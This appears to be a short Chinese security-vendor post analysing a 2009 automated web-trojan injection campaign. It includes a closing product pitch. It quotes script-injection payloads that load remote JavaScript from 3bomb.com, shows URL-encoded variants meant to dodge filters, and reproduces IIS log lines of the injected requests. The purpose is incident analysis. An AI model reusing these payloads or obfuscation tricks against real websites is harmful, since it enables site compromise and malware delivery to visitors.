最近一种新的挂马引擎开始出现,用GOOGLE搜索下com/c.js, 约有16,200个网站被挂马。
最终经过安全伞研究如下:
挂马引擎通过网页爬行技术不停的提交挂马代码,主要有%D3%AA%D1%F8<script%20src=http://3bomb.%63%6Fm/c.js></script>
中间部分不断变形
<script%20src=http://3b%6F%6Dbcom/c.js></script>
<script%20src=http://%33bomb.com/c.js></script>
IIS日志如下:
2009-01-20 09:18:25 W3SVC9 221.130.199.26 GET /xueyuan/list2.aspx name=%b2%df%c2%d4%3cscript+src%3dhttp%3a%2f%2f3b%256F%256Db.com%2fc.js%3e%3c%2fscript%3e 80 - 72.30.142.159 Mozilla/5.0+(compatible;+Yahoo!+Slurp;+http://help.yahoo.com/help/us/ysearch/slurp) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/debc07d3-3ccb-4676-ad90-144be37027e5.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/0a5d18e3-3018-47a2-ac57-99909ce5c58a.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /xcg/images/top_search.jpg - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/new_34528523.jpg - 80 - 116.5.162.127 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1;+SV1) 200 0 0
2009-01-20 11:37:41 W3SVC9 221.130.199.26 GET /uploadfiles/510be59b-07fd-4868-87b7-d3cbc677f3a7.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/86181994-719e-440e-abc6-2e7e834b3ebc.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/2e60e9fe-1fa1-495d-8a64-d21a73ec1099.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/db7ed03e-0308-4a0f-9e82-86552f350f2f.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/221d7e7d-2e21-4cb2-a496-1c7627f200f9.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/e9928c0c-d27f-45ba-b873-09bbde17f58e.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 11:37:42 W3SVC9 221.130.199.26 GET /uploadfiles/10364b4a-5dde-4d6d-a9e7-17efaf3983d4.gif<script+src=http:/3bomb.com/c.js></script><script+src=http:/3bomb.com/c.js></script> - 80 - 221.239.165.30 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1) 302 0 0
2009-01-20 21:07:14 W3SVC9 221.130.199.26 GET /food/List.aspx Title=%BD%A1%BF%B5<script%20src=http://3b%6F%6Db.com/c.js></script><script%20src=http://%33bomb.com/c.js></script> 80 - 202.160.179.83 Mozilla/5.0+(compatible;+Yahoo!+Slurp+China;+http://misc.yahoo.com.cn/help.html) 302 0 0
该木马通过Cookie,GET,POST注入挂马,使用搜索引擎自动查找并注入网站,有点蠕虫的性质。
安全伞2009企业版可以有效解决类似变相注入问题